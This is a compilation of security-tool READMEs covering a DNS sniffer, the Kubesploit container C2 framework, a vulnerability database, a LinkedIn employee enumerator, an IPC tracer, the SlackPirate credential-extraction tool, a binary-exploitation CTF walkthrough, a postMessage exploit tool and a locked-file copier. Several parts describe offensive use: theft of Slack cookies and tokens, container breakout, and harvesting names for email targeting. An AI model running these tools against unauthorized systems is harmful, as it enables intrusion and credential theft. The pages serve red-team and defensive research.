
Dnspeep - Spy On The DNS Queries Your Computer Is Making



dnspeep lets you spy on the DNS queries your computer is making.

Here's some example output:

$ sudo dnspeep
query name server IP response
A incoming.telemetry.mozilla.org 192.168.1.1 CNAME: telemetry-incoming.r53-2.services.mozilla.com, CNAME: pipeline-incoming-prod-elb-149169523.us-west-2.elb.amazonaws.com, A: 52.39.144.189, A: 54.191.136.131, A: 34.215.151.143, A: 54.149.208.57, A: 44.226.235.191, A: 52.10.174.113, A: 35.160.138.173, A: 44.238.190.78
AAAA incoming.telemetry.mozilla.org 192.168.1.1 CNAME: telemetry-incoming.r53-2.services.mozilla.com, CNAME: pipeline-incoming-prod-elb-149169523.us-west-2.elb.amazonaws.com
A www.google.com 192.168.1.1 A: 172.217.13.132
AAAA www.google.com 192.168.1.1 AAAA: 2607:f8b0:4020:807::2004
A www.neopets.com 192.168.1.1 CNAME: r9c3n8d2.stackpathcdn.com, A: 151.139.128.11
AAAA www.neopets.com 192.168.1.1 CNAME: r9c3n8d2.stackpathcdn.com


How to install

You can install dnspeep using the different methods below.


Installing the binary release
  1. Download a recent release of dnspeep from the GitHub releases page
  2. Unpack it
  3. Put the dnspeep binary in your PATH (for example in /usr/local/bin)

Compiling and installing from source
  1. Download a recent source release of dnspeep from the GitHub releases page, or git clone this repository.
  2. Unpack it
  3. Run cargo build --release
  4. Change to the target/release directory.
  5. Put the dnspeep binary in your PATH (for example in /usr/local/bin)
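
As a single sequence when building from a git clone (assuming the upstream repository is jvns/dnspeep; substitute your own clone URL if it differs):

git clone https://github.com/jvns/dnspeep.git
cd dnspeep
cargo build --release
sudo cp target/release/dnspeep /usr/local/bin/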

Installing from a Linux package manager
  • If you are using Arch Linux, then you can install dnspeep from the AUR.

How it works

It uses libpcap to capture packets on port 53, and then matches up DNS request and response packets so that it can show the request and response together on the same line.

It also tracks DNS queries which didn't get a response within 1 second and prints them out with the response <no response>.
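
For example, a query that never gets an answer would show up with <no response> in the last column (illustrative output, not captured from a real run):

query   name               server IP     response
A       slow.example.com   192.168.1.1   <no response>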


Limitations
  • Only supports the DNS query types supported by the dns_parser crate (here's a list)
  • Doesn't support TCP DNS queries, only UDP
  • It can't show DNS-over-HTTPS queries (because it would need to MITM the HTTPS connection)



Kubesploit - A Cross-Platform Post-Exploitation HTTP/2 Command And Control Server And Agent Written In Golang



Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang, dedicated to containerized environments, and built on top of the Merlin project by Russel Van Tuyl (@Ne0nd0g).


Our Motivation

While researching Docker and Kubernetes, we noticed that most of the tools available today are aimed at passive scanning for vulnerabilities in the cluster, and that coverage of more complex attack vectors is lacking.
They might allow you to see the problem but not exploit it. Running the exploit is important, because it simulates a real-world attack and can be used to determine corporate resilience across the network.
Running an exploit also exercises the organization's cyber event management, which doesn't happen when merely scanning for cluster issues.
It can help the organization learn how to operate when real attacks happen, see whether its detection systems work as expected, and decide what changes should be made.
We wanted to create an offensive tool that meets these requirements.

But we had another reason to create such a tool. We already had two open-source tools (KubiScan and kubeletctl) related to Kubernetes, and we had ideas for more. Instead of creating a project for each one, we thought it would be better to build a new tool that centralizes them, and this is how Kubesploit was created.

We searched for an open-source project that provides the heavy lifting for a cross-platform system, and we found Merlin, written by Russel Van Tuyl (@Ne0nd0g), to be suitable for us.

Our main goal is to contribute to raising awareness about the security of containerized environments, and to improve the mitigations implemented in the various networks. All of this is captured in a framework that provides the appropriate tools for PT teams and Red Teamers during their activities in these environments. Using these tools will help you estimate these environments' strengths and make the required changes to protect them.


What's New

As the C&C and agent infrastructure were already provided by Merlin, we integrated a Go interpreter ("Yaegi") to be able to run Golang code sent from the server on the agent.
This allowed us to write our modules in Golang, gave us more flexibility in the modules, and let us load new modules dynamically. It is an ongoing project, and we plan to add more modules related to Docker and Kubernetes in the future.

The currently available modules are:

  • Container breakout using mounting
  • Container breakout using docker.sock
  • Container breakout using CVE-2019-5736 exploit
  • Scan for Kubernetes cluster known CVEs
  • Port scanning with focus on Kubernetes services
  • Kubernetes service scan from within the container
  • Light kubeletctl containing the following options:
    • Scan for containers with RCE
    • Scan for Pods and containers
    • Scan for tokens from all available containers
    • Run command with multiple options

Quick Start

We created a dedicated Kubernetes environment in Katacoda for you to experiment with Kubesploit.
It’s a full simulation with a complete set of automated instructions on how to use Kubesploit. We encourage you to explore it.



Build

To build this project, run the make command from the root folder.


Quick Build

To run quick build for Linux, you can run the following:

export PATH=$PATH:/usr/local/go/bin
go build -o agent cmd/merlinagent/main.go
go build -o server cmd/merlinserver/main.go
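
A minimal sketch of running the resulting binaries (the -url agent flag and the default listener come from Merlin and are assumptions here; adjust to your setup):

# on the C2 host
./server

# on the target, pointing the agent at the server
./agent -url https://<server-ip>:443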

Mitigations

YARA rules

We created YARA rules that will help to catch Kubesploit binaries. The rules are written in the file kubesploit.yara.
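
To check files against these rules with the standard YARA CLI (assuming yara is installed; -r recurses into directories):

yara -r kubesploit.yara /path/to/suspicious/files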


Agent Recording

Every Go module loaded onto the agent is recorded on the victim machine.


MITRE map

We created a MITRE map of the attack vectors used by Kubesploit.



Mitigation for Modules

For every module we created, we wrote a description and how to defend against it.
This is summarized in the MITIGATION.md file.


Contributing

We welcome contributions of all kinds to this repository.
For instructions on how to get started and descriptions of our development workflows, please see our contributing guide.


Credit

We want to thank Russel Van Tuyl (@Ne0nd0g) for creating Merlin as an open-source project that allowed us to build Kubesploit on top of it.
We also want to thank Traefik Labs (@traefik) for creating the Go interpreter ("Yaegi"), which allowed us to easily run Golang modules on a remote agent.


Share Your Thoughts And Feedback

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) from CyberArk Labs or open an issue. You can find more projects developed by us at https://github.com/cyberark/.



Vulnerablecode - A Free And Open Vulnerabilities Database And The Packages They Impact And The Tools To Aggregate And Correlate These Vulnerabilities



VulnerableCode is a free and open database of FOSS software package vulnerabilities and the tools to create and keep the data current.

It is made by the FOSS community to improve and secure the open source software ecosystem.


Why?

The existing solutions are commercial proprietary vulnerability databases, which in itself does not make sense because the data is about FOSS (Free and Open Source Software).

The National Vulnerability Database, which is the primary centralized data source for known vulnerabilities, is not particularly well suited to address FOSS security issues because:

  1. It predates the explosion of FOSS software usage
  2. Its data format reflects a commercial vendor-centric point of view, in part due to the use of CPEs to map vulnerabilities to existing packages.
  3. CPEs are just not designed to map FOSS to vulnerabilities owing to their vendor-product centric semantics. This makes it really hard to answer the fundamental questions "Is package foo vulnerable?" and "Is package foo vulnerable to vulnerability bar?"

How

VulnerableCode independently aggregates many software vulnerability data sources and supports data re-creation in a decentralized fashion. These data sources (see complete list here) include security advisories published by Linux and BSD distributions, application software package managers and package repositories, FOSS projects, GitHub and more. Thanks to this approach, the data is focused on specific ecosystems yet aggregated in a single database that enables querying a richer graph of relations between multiple incarnations of a package. Being specific increases the accuracy and validity of the data as the same version of an upstream package across different ecosystems may or may not be vulnerable to the same vulnerability.

Packages are identified using Package URLs (PURL) as primary identifiers rather than CPEs. This makes answers to questions such as "Is package foo vulnerable to vulnerability bar?" much more accurate and easy to interpret.

The primary access to the data is through a REST API.
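
For example, once a local instance is running (see the setup below), a PURL-based lookup could look like this sketch; the exact endpoint and parameters are assumptions, so check http://127.0.0.1:8000/api/docs for the authoritative reference:

curl -s "http://127.0.0.1:8000/api/packages/?purl=pkg:pypi/django@3.0"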

In addition, an emerging web interface aims to support browsing and searching the vulnerability data, and progressively to enable community curation of the data through the addition of new packages and vulnerabilities and the review and update of their relationships.

We also plan to mine for vulnerabilities that never received any exposure, for reasons such as the complicated procedure for obtaining a CVE ID or a bug not being classified as a security issue.



Setting up VulnerableCode

First clone the source code:

git clone https://github.com/nexB/vulnerablecode.git
cd vulnerablecode

Using Docker Compose

An easy way to set up VulnerableCode is with docker containers and docker compose. For this you need to have the following installed.

  • Docker Engine. Find instructions to install it here
  • Docker Compose. Find instructions to install it here

Use sudo docker-compose up to start VulnerableCode. Then access VulnerableCode at http://localhost:8000/ or at http://127.0.0.1:8000/

Important: Don't forget to run sudo docker-compose up -d --no-deps --build web to sync your instance after every git pull.

Use sudo docker-compose exec web bash to access the VulnerableCode container. From here you can access manage.py and run management commands to import data as specified below.
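
For example, to list the available importers from inside the container (mirroring the import commands shown later):

sudo docker-compose exec web bash
DJANGO_DEV=1 python manage.py import --list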


Without Docker Compose

System requirements

  • Python 3.8+
  • PostgreSQL 9+
  • Compiler toolchain and development files for Python and PostgreSQL

On Debian-based distros, these can be installed with:

sudo apt-get install python3-venv python3-dev postgresql libpq-dev build-essential

Database configuration

  • Create a user named vulnerablecode. Use vulnerablecode as password when prompted:

    sudo -u postgres createuser --no-createrole --no-superuser --login \
      --inherit --createdb --pwprompt vulnerablecode

  • Create a database named vulnerablecode:

    createdb --encoding=utf-8 --owner=vulnerablecode --user=vulnerablecode \
      --password --host=localhost --port=5432 vulnerablecode

Application dependencies

Create a virtualenv, install dependencies, generate static files and run the database migrations:

python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
DJANGO_DEV=1 python manage.py collectstatic
DJANGO_DEV=1 python manage.py migrate

The environment variable DJANGO_DEV is used to load settings suitable for development, defined in vulnerablecode/dev.py. If you don't want to type it every time use export DJANGO_DEV=1 instead. Do not use DJANGO_DEV in a production environment.

For production mode, an environment variable named SECRET_KEY needs to be set. The recommended way to generate this key is to use the code Django includes for this purpose:

SECRET_KEY=$(python -c "from django.core.management import utils; print(utils.get_random_secret_key())")

You will also need to set the VC_ALLOWED_HOSTS environment variable to match the hostname where the app is deployed:

VC_ALLOWED_HOSTS=vulnerablecode.your.domain.example.com

You can specify several hosts by separating them with a colon :
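
For example (both hostnames are placeholders):

VC_ALLOWED_HOSTS=vulnerablecode.your.domain.example.com:standby.your.domain.example.com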


Using Nix

You can install VulnerableCode with Nix (Flake support is needed):

cd etc/nix
nix-shell -p nixFlakes --run "nix --print-build-logs flake check " # build & run tests

There are several options to use the Nix version:

# Enter an interactive environment with all dependencies set up.
cd etc/nix
nix develop
> ../../manage.py ... # invoke the local checkout
> vulnerablecode-manage.py ... # invoke manage.py as installed in the nix store

# Test the import procedure using the Nix version.
etc/nix/test-import-using-nix.sh --all # import everything
# Test the import using the local checkout.
INSTALL_DIR=. etc/nix/test-import-using-nix.sh ruby # import ruby only

Keeping the Nix setup in sync

The Nix installation uses mach-nix to handle Python dependencies because some dependencies are currently not available as Nix packages. All Python dependencies are automatically fetched from ./requirements.txt. If the mach-nix-based installation fails, you might need to update mach-nix itself and the pypi-deps-db version in use (see etc/nix/flake.nix:inputs.machnix and machnixFor.pypiDataRev).

Non-Python dependencies are curated in:

etc/nix/flake.nix:vulnerablecode.propagatedBuildInputs

Run Tests

Use these commands to run code style checks and the test suite:

black -l 100 --check .
DJANGO_DEV=1 python -m pytest

Data import

Some data importers use the GitHub APIs. For this, export the GH_TOKEN environment variable with:

export GH_TOKEN=yourgithubtoken

See GitHub docs for instructions on how to obtain your GitHub token.

To run all data importers use:

DJANGO_DEV=1 python manage.py import --all

To list available importers use:

DJANGO_DEV=1 python manage.py import --list

To run specific importers:

DJANGO_DEV=1 python manage.py import rust npm

REST API access

Start the webserver:

DJANGO_DEV=1 python manage.py runserver

For full documentation about API endpoints use this URL:

http://127.0.0.1:8000/api/docs

Continuous periodic Data import

If you want to run the import periodically, you can use a systemd timer:

$ cat ~/.config/systemd/user/vulnerablecode.service

[Unit]
Description=Update vulnerability database

[Service]
Type=oneshot
Environment="DJANGO_DEV=1"
ExecStart=/path/to/venv/bin/python /path/to/vulnerablecode/manage.py import --all

$ cat ~/.config/systemd/user/vulnerablecode.timer

[Unit]
Description=Periodically update vulnerability database

[Timer]
OnCalendar=daily

[Install]
WantedBy=timers.target

Start this "timer" with:

systemctl --user daemon-reload
systemctl --user start vulnerablecode.timer


CrossLinked - LinkedIn Enumeration Tool To Extract Valid Employee Names From An Organization Through Search Engine Scraping



CrossLinked is a LinkedIn enumeration tool that uses search engine scraping to collect valid employee names from a target organization. This technique provides accurate results without the use of API keys, credentials, or even accessing the site directly. Formats can then be applied in the command line arguments to turn these names into email addresses, domain accounts, and more.

For a full breakdown of the tool and example output, check out:
https://m8r0wn.com/posts/2021/01/crosslinked.html


Setup
git clone https://github.com/m8r0wn/crosslinked
cd crosslinked
pip3 install -r requirements.txt

Examples

Results are written to a 'names.txt' file in the current directory unless specified in the command line arguments. See the Usage section for additional options.

python3 crosslinked.py -f '{first}.{last}@domain.com' company_name
python3 crosslinked.py -f 'domain\{f}{last}' -t 45 -j 1 company_name

Usage
positional arguments:
  company_name        Target company name

optional arguments:
  -h, --help          show this help message and exit
  -t TIMEOUT          Max timeout per search (Default=20, 0=None)
  -j JITTER           Jitter between requests (Default=0)
  -v                  Show names and titles recovered after enumeration

Search arguments:
  -H HEADER           Add Header ('name1=value1;name2=value2;')
  --search ENGINE     Search Engine (Default='google,bing')
  --safe              Only parse names with company in title (Reduces false positives)

Output arguments:
  -f NFORMAT          Format names, ex: 'domain\{f}{last}', '{first}.{last}@domain.com'
  -o OUTFILE          Change name of output file (default=names.txt)

Proxy arguments:
  --proxy PROXY       Proxy requests (IP:Port)
  --proxy-file PROXY  Load proxies from file for rotation

Proxy Support

The latest version of CrossLinked provides proxy support through the Taser library. Users can mask their traffic with a single proxy by adding --proxy 127.0.0.1:8080 to the command line arguments, or use --proxy-file proxies.txt for rotating source addresses.

http/https proxies can be added in IP:PORT notation, while SOCKS requires a socks4:// or socks5:// prefix.
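
For example, combining the proxy options with the name formats documented above (proxies.txt is a placeholder file with one proxy per line):

python3 crosslinked.py --proxy socks5://127.0.0.1:9050 -f '{first}.{last}@domain.com' company_name
python3 crosslinked.py --proxy-file proxies.txt -f '{f}{last}@domain.com' company_name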



IPCDump - Tool For Tracing Interprocess Communication (IPC) On Linux



Announcement post

ipcdump is a tool for tracing interprocess communication (IPC) on Linux. It covers most of the common IPC mechanisms -- pipes, fifos, signals, unix sockets, loopback-based networking, and pseudoterminals. It's a useful tool for debugging multi-process applications, and it's also a simple way to understand how the different moving parts in your system communicate with one another. ipcdump can trace both the metadata and the contents of this communication, and it's particularly well-suited to tracing IPC between short-lived processes, which can be difficult using traditional debugging tools like strace or gdb. It also has some basic filtering capabilities to help you sift through large quantities of events.

Most of the information ipcdump collects comes from BPF hooks placed on kprobes and tracepoints at key functions in the kernel, although it also fills in some bookkeeping from the /proc filesystem. To this end ipcdump makes heavy use of gobpf, which provides golang bindings for the bcc framework.


Requirements & Usage
  • golang >= 1.15.6

Tested operating systems and kernels

Kernel    Ubuntu 18.04 LTS    Ubuntu 20.04 LTS
4.15.0    Tested              Not Tested
5.4.0     Not Tested          Tested
5.8.0     Not Tested          Tested*

*Requires building bcc from source


Building

Dependencies
  1. Install golang

snap install go --classic

or directly from the golang website

  2. Install BCC using iovisor's instructions, depending on the operating system you chose (usually the newer versions will require building from source)

Building ipcdump
git clone https://github.com/guardicore/IPCDump
cd IPCDump/cmd/ipcdump
go build

Usage
./ipcdump -h
Usage of ./ipcdump:
  -B uint
        max number of bytes to dump per event, or 0 for complete event (may be large). meaningful only if -x is specified.
  -D value
        filter by destination comm (can be specified more than once)
  -L    do not output lost event information
  -P value
        filter by comm (either source or destination, can be specified more than once)
  -S value
        filter by source comm (can be specified more than once)
  -c uint
        exit after <count> events
  -d value
        filter by destination pid (can be specified more than once)
  -f string
        <text|json> output format (default is text) (default "text")
  -p value
        filter by pid (either source or destination, can be specified more than once)
  -s value
        filter by source pid (can be specified more than once)
  -t value
        filter by type (can be specified more than once).
        possible values: a|all k|signal u|unix ud|unix-dgram us|unix-stream t|pty lo|loopback lt|loopback-tcp lu|loopback-udp p|pipe
  -x    dump IPC bytes where relevant (rather than just event details).

One-liners

Run as root:

# dump all ipc on the system
./ipcdump

# dump signals sent between any two processes
./ipcdump -t kill

# dump loopback TCP connection metadata to or from pid 1337
./ipcdump -t loopback-tcp -p 1337

# dump unix socket IPC metadata and contents from Xorg
./ipcdump -t unix -x -S Xorg

# dump json-formatted pipe i/o metadata and first 64 bytes of contents
./ipcdump -t pipe -x -B 64 -f json

Features
  • Support for pipes and FIFOs
  • Loopback IPC
  • Signals (regular and realtime)
  • Unix streams and datagrams
  • Pseudoterminal-based IPC
  • Event filtering based on process PID or name
  • Human-friendly or JSON-formatted output

Design

ipcdump is built of a series of collectors, each of which is in charge of a particular type of IPC event. For example, IPC_EVENT_LOOPBACK_SOCK_UDP or IPC_EVENT_SIGNAL.

In practice, all of the collectors are built using bpf hooks attached to kprobes and tracepoints. Their implementations are entirely separate, though -- there's no particular reason to assume our information will always come from bpf. That said, the different collectors do have to share a single bpf module, because there's some common code that they need to share. To this end, we share a single BpfBuilder (which is essentially a wrapper around concatenating strings of bcc code) and each collector registers its own code with that builder. The full bcc script is then loaded with gobpf, and each module places the hooks it needs.

There are currently two kinds of bookkeeping that are shared between IPC collectors:

  • SocketIdentifier (internal/collection/sock_id.go) -- maps between kernel struct sock* and the processes that use them.
  • CommIdentifier (internal/collection/comm_id.go) -- maps between pid numbers and the corresponding process name (/proc/<pid>/comm).

The bookkeeping done in each of these is particularly important for short-lived processes; while this information can be filled out later in usermode by parsing /proc, often the relevant process will have disappeared by the time the event hits the handler. That said, we do sometimes fill in information from /proc. This happens mostly for processes that existed before ipcdump was run; we won't catch events like process naming in this case. SocketIdentifier and CommIdentifier sort of try and abstract this duality between bcc code and /proc parsing behind a single API, although it's not super-clean. By the way, in super-new versions of Linux (5.8), bpf iterators can entirely replace this bookkeeping, although for backwards compatibility we should probably stick to the hooks-and-procfs paradigm for now.

Event output is done through the common EmitIpcEvent() function, which takes a standard event format (source process, dest process, metadata key-value pairs, and contents) and outputs it in a unified format. To save event bandwidth, collectors typically don't output IPC contents if the -x flag isn't specified. This is done with some fancy preprocessing magic in internal/collection/ipc_bytes.go.


Contributing

Please do! Check out TODO for the really important stuff. Most of the early work on ipcdump will probably involve making adjustments for different kernel versions and symbols.



SlackPirate - Slack Enumeration And Extraction Tool - Extract Sensitive Information From A Slack Workspace



This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token.

As of May 2018, Slack has over 8 million customers and that number is rapidly rising - the integration and 'ChatOps' possibilities are endless and allow teams (not just developers!) to create some really powerful workflows and Slack bot/application interactions.


As is the way with corporations large and small, it is not unusual for tools such as Slack to fly under the Information Security governance/policy radar, which ultimately leads to precarious situations whereby sensitive and confidential information ends up in places it shouldn't be.

The purpose of this tool is two-fold:

  • Red-teamers can use this to identify and extract sensitive information, documents, credentials, etc from Slack given a low-privileged account to the organisation's Workspace. This could allow an attacker to pivot on to other systems and/or gain far more intimate knowledge and inner-workings of corporate systems/applications
  • Blue-teamers can use this to identify and detect sensitive information on the Workspace that perhaps shouldn't exist on there in the first instance. Blue-teamers can use this information for internal training and awareness purposes by demonstrating the output of the tool and the type of 'things' that could be used and abused by (internal as well as external) attackers.

The tool allows you to easily gather sensitive information for offline viewing at your convenience.

Note: I'm a Python n00b and have no doubt that the script can be optimised and improved massively - please feel free to make pull requests; I'll review and merge them as appropriate!


Information Gathering

The tool uses the native Slack APIs to extract 'interesting' information and currently looks for the following:

  • Print to standard output the domains (if any) that are allowed to register for the Workspace - I've seen stale, old and forgotten domains here that can be purchased and used to register for the Workspace
  • Links to S3 buckets
  • Passwords
  • AWS Access/Secret keys
  • Private Keys
  • Pinned messages across all Channels
  • References to links and URLs that could provide further access to sensitive materials - think: Google Docs, Trello Invites, links to internal systems, etc
  • Files which could contain sensitive information such as .key, .sh, the words "password" or "secret" embedded in a document, etc

Slack Cookie

The Slack web application uses a number of cookies - the one of special interest is called, wait for it... d. This d cookie is the same across all Workspaces the victim has access to. What this means in reality is that a single stolen d cookie would allow an attacker to get access to all of the Workspaces the victim is logged-in to; my experience with the Slack web application is that once you are logged in, you'll remain logged in indefinitely.


Slack Token

The Slack API token is a per-workspace token. One token cannot (as far as I know) access other workspaces in the same way the d cookie above allows access to all Workspaces.

For the tool to search for and extract information, you will need to provide it with an API token. There are two straightforward ways of doing this:

  • Provide the tool a d cookie by using the --cookie flag. The tool will output the associated Workspaces and tokens
  • Provide the tool with a token directly by using the --token flag. You can find this by viewing the source of the Workspace URL and doing a search for XOX

The token will look something like this:

api_token: "xoxs-x-x-x-x"

Make a copy of that and pass that in to the script using the --token flag.


Building

The script has been developed, tested and confirmed working on Python 3.5, 3.6 and 3.7. A quick test on Python 2 presented some compatibility issues.


Linux with virtualenv
  • git clone https://github.com/emtunc/SlackPirate
  • pip install virtualenv
  • virtualenv SlackPirate
  • source SlackPirate/bin/activate
  • pip install -r requirements.txt
  • ./SlackPirate.py --help

Linux without virtualenv
  • git clone https://github.com/emtunc/SlackPirate
  • chmod +x SlackPirate.py
  • pip install -r requirements.txt
  • ./SlackPirate.py --help

Windows with virtualenv
  • git clone https://github.com/emtunc/SlackPirate
  • pip install virtualenv
  • virtualenv SlackPirate
  • SlackPirate\Scripts\activate.bat
  • pip install -r requirements.txt
  • python SlackPirate.py --help

Windows without virtualenv
  • git clone https://github.com/emtunc/SlackPirate
  • pip install -r requirements.txt
  • python SlackPirate.py --help

Usage

python3 SlackPirate.py --help

  • Display the help menu - this includes information about all scan modules you can explicitly select or ignore

python3 SlackPirate.py --interactive

  • Interactive mode instructs the tool to allow you to provide a token or cookie, and choose scans to run through a console UI rather than via command line arguments.

python3 SlackPirate.py --cookie <cookie>

This will do the following:

  • Find any associated Workspaces that can be accessed using that cookie
  • Connect to any Workspaces that were returned
  • Look for API Tokens in each returned Workspace
  • Print to standard output for use in the next command

python3 SlackPirate.py --token <token>

This will do the following:

  • Check Token validity and only continue if Slack returns True
  • Print to standard output if the token supplied has admin, owner or primary_owner privileges
  • Print to standard output if the tool found any @domains that can be used to register for the Slack Workspace (you may be surprised by what you find here - if you're lucky you'll find an old, unused, registerable domain here)
  • Dump team access logs in .json format if the token provided is a privileged token
  • Dump the user list in .json format
  • Find references to S3 buckets
  • Find references to passwords and other credentials
  • Find references to AWS keys
  • Find references to private keys
  • Find references to pinned messages across all Slack channels
  • Find references to interesting URLs and links
  • Lastly, the tool will attempt to download files based on pre-defined keywords

python3 SlackPirate.py --token <token> --s3-scan

  • This will instruct the tool to only run the S3 scan

python3 SlackPirate.py --token <token> --no-s3-scan

  • This will instruct the tool to run all scans apart from the S3 scan

python3 SlackPirate.py --token <token> --verbose

  • Verbose mode will output files in .CSV format - this provides a lot more information, such as channel names, usernames, perma-links and more.




Join the conversation

A public Slack Workspace has been set-up where anyone can join and discuss new features, changes, feature requests or simply ask for help. Here's the invite link: https://join.slack.com/t/slackpirate/shared_invite/zt-6o3d9tjq-PhbMxtM2o5ALgFkOB9V_dg



OverRide - Binary Exploitation And Reverse-Engineering (From Assembly Into C)



Explore disassembly, binary exploitation & reverse-engineering through 10 little challenges.

In the folder for each level you will find:

  • flag - password for next level

  • README.md - how to find password

  • source.c - the reverse engineered binary

  • dissasembly_notes.md - notes on asm

See the subject for more details.

For more gdb & exploitation fun check out the previous project RainFall.

Final Score 125/100

Getting Started

First download OverRide.iso from 42.


Virtual Machine setup

On Mac OSX, install VirtualBox.

In VirtualBox create a new VM (click new).

  • Name and operating system - Type: Linux, Version: (Oracle 64-bit)

Continue through all the next steps with the default settings:

  • Memory size: 4MB
  • Hard disk: Create a disk now
  • Hard disk file type: VDI(VirtualBox Disk Image)
  • Storage on physical hard disk: Dynamically allocated
  • File size: 12,00GB

Next click Settings > Network > Adapter 1 > Attached to: Bridged Adapter.

Still in settings click Storage > Right of "Controller: IDE", there is a CD icon with a + sign (add optical drive). Click Add Disk Image, and select OverRide.iso.

Click Start to start the VM; once running it should show the VM IP address and prompt the user to login.


SSH connect

Log in from a separate shell as user level00 with password level00.

ssh level00@{VM_IP} -p 4242



Level Up

As user level00 the goal is to read the password for user level01, found at /home/users/level01/.pass. However, user level00 does not have permissions to read this file.

In the home folder for user level00 is a binary level00 with SUID set and owner level01.



This means when we execute the binary level00, we do so with the permissions of user level01.

We must find a vulnerability in the binary level00 with gdb. Then exploit the vulnerability to run system("/bin/sh"), opening a shell as user level01 where we have permissions to read the password.

cat /home/users/level01/.pass

Then log in as user level01.

su level01
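
Putting the level flow together, an illustrative session (the exploit step and password are placeholders):

level00@OverRide:~$ ./level00
(... exploit input that reaches system("/bin/sh") ...)
$ cat /home/users/level01/.pass
<level01 password>
$ su level01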


 

Repeat for each level.


Reverse-engineered binary

For each level, we reverse engineered the original source.c by examining the gdb disassembly of the binary.


Levels Overview
  • 0 - Hardcoded password

  • 1 - Ret2Libc attack

  • 2 - printf() format string attack

  • 3 - Brute force password

  • 4 - gets() stack overflow + Return-to-libc attack

  • 5 - Shellcode in env variable + printf() format string attack

  • 6 - Hash value discoverable with gdb

  • 7 - Ret2Libc Attack on unprotected data table

  • 8 - Binary backs up password via symlink

  • 9 - Off-by-one error


Team

I wrote this project in a team with the awesome @dfinnis.



Posta - Cross-document Messaging Security Research Tool



Posta is a tool for researching Cross-document Messaging communication. It allows you to track, explore and exploit postMessage vulnerabilities, and includes features such as replaying messages sent between windows within any attached browser.



Prerequisites
  • Google Chrome / Chromium
  • Node.js (optional)

Installation

Development Environment

Run Posta in a full development environment with a dedicated browser (Chromium):

  1. Install Posta
    git clone https://github.com/benso-io/posta
    cd posta
    npm install
  2. Launch the dedicated Chromium session using the following command:
    node posta <URL>
  3. Click on the Posta extension to navigate to the UI

Dev mode includes a local web server that serves a small testing site and the exploit page. When running in dev mode, you can access the exploit page at http://localhost:8080/exploit/
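
For example, to point the dedicated browser at the bundled test site (assuming dev mode's local web server is listening on port 8080):

node posta http://localhost:8080/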


Chrome Extension

Run Posta as a Chrome / Chromium Extension:

  1. Clone the repo:
    git clone https://github.com/benso-io/posta.git
  2. Navigate to chrome://extensions
  3. Make sure Developer mode is enabled
  4. Click on Load unpacked
  5. Choose the chrome-extension directory inside Posta and upload it to your browser
  6. Load the extension
  7. Pin the extension to your browser
  8. Browse to the website you would like to examine
  9. Click on the Posta extension to navigate to the UI

Tabs

In the Tabs section we can find our main Origin, with the iframes it hosts and communicates with through the session. We can choose the specific frame by clicking on it, and observe the postMessages related to that frame only.



Messages

In the Messages section, we can inspect all postMessage traffic being sent from the origin to its iframes, and vice versa. We can select a specific communication for further examination by clicking on it. The Listeners area presents the code in charge of handling the communication; we can click and copy its contents for JS code observation.




Console

In the console section, we can modify the original postMessage traffic and replay the messages with the tampered values, which will be sent from the Origin to its iframe.

We should test whether we can affect the behavior of the website by changing the postMessage content. If we manage to do so, it's time to try and exploit it from a different Origin, by clicking "Simulate exploit".




Exploit

Click on the "host" button in order to navigate to the exploitation window.


 

In the Exploit section, Posta will try to host the specified origin as an iframe in order to initiate postMessage communication. Most of the time we won't be able to do so, due to X-Frame-Options being enabled on the origin website.

Therefore, in order to continue with our exploitation, we'll need to obtain a reference to our Origin via the window.open method, which can be achieved by clicking on "Open as tab".

We have the console to our right, which will help us modify and craft our payloads and test them in Cross-Origin communication, initiated by clicking on the Exploit button.




Tscopy - Tool to parse the NTFS $MFT file to locate and copy specific files



Introducing TScopy

It is a requirement during an Incident Response (IR) engagement to have the ability to analyze files on the filesystem. Sometimes these files are locked by the operating system (OS) because they are in use, which is particularly frustrating with event logs and registry hives. TScopy allows the user, who is running with administrator privileges, to access locked files by parsing out their raw location in the filesystem and copying them without asking the OS.

There are other tools that perform similar functions, such as RawCopy, which we have used and is the basis for this tool. However, there are some disadvantages to RawCopy that led us to develop TScopy, including performance, size, and the ability to incorporate it in other tools.

This blog is intended to introduce TScopy but also to ask for assistance. As in all software development, the more a tool is used, the more edge cases can be found. We are asking that people try out the tool and report any bugs.


What is TScopy?

TScopy is a Python script used to parse the NTFS $MFT file to locate and copy specific files. By parsing the Master File Table (MFT), the script bypasses operating system locks on files. The script was originally based on the work of RawCopy. RawCopy is written in AutoIT and is difficult to modify for our purposes. The decision to port RawCopy to Python was done because of the need to incorporate this functionality natively into our toolset.

TScopy is designed to be run as a standalone program or included as a python module. The python implementation makes use of the python-ntfs tools found at https://github.com/williballenthin/python-ntfs. TScopy built upon the base functionality of python-ntfs to isolate the location of each file from the raw disk.


What makes TScopy different?

TScopy is written in Python and organized into classes to make it more maintainable and readable than AutoIT. AutoIT can be flagged as malicious by anti-virus or detection software because some malware has utilized its potential.

The major difference between TScopy and RawCopy is the ability to copy multiple files per execution and to cache the file structure. As shown in the image below, TScopy has options to download a single file, multiple comma delimited files, the contents of a directory, wildcarded paths (individual files or directories), and recursive directories.

TScopy caches the location of each directory and file as it iterates the target file’s full path. It then uses this cache to optimize the search for any other files, ensuring future file copies are performed much faster. This is a significant advantage over RawCopy, which iterates over the entire path for each file.


TScopy Options
.\TScopy_x64.exe -h

usage:
TScopy_x64.exe -r -o c:\test -f c:\users\tscopy\ntuser.dat
Description: Copies only the ntuser.dat file to the c:\test directory
TScopy_x64.exe -o c:\test -f c:\Windows\system32\config
Description: Copies all files in the config directory but does not copy the directories under it.
TScopy_x64.exe -r -o c:\test -f c:\Windows\system32\config
Description: Copies all files and subdirectories in the config directory.
TScopy_x64.exe -r -o c:\test -f c:\users\*\ntuser*,c:\Windows\system32\config
Description: Uses Wildcards and listings to copy any file beginning with ntuser under users accounts and recursively copies the registry hives.


Copy protected files by parsing the MFT. Must be run with Administrator privileges

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  Full path of the file or directory to be copied.
                        Filenames can be grouped in a comma ',' seperated
                        list. Wildcard '*' is accepted.
  -o OUTPUTDIR, --outputdir OUTPUTDIR
                        Directory to copy files too. Copy will keep paths
  -i, --ignore_saved_ref_nums
                        Script stores the Reference numbers and path info to
                        speed up internal run. This option will ignore and not
                        save the stored MFT reference numbers and path
  -r, --recursive       Recursively copies directory. Note this only works with
                        directories.

There is a hidden option ‘--debug’, which enables the debug output.


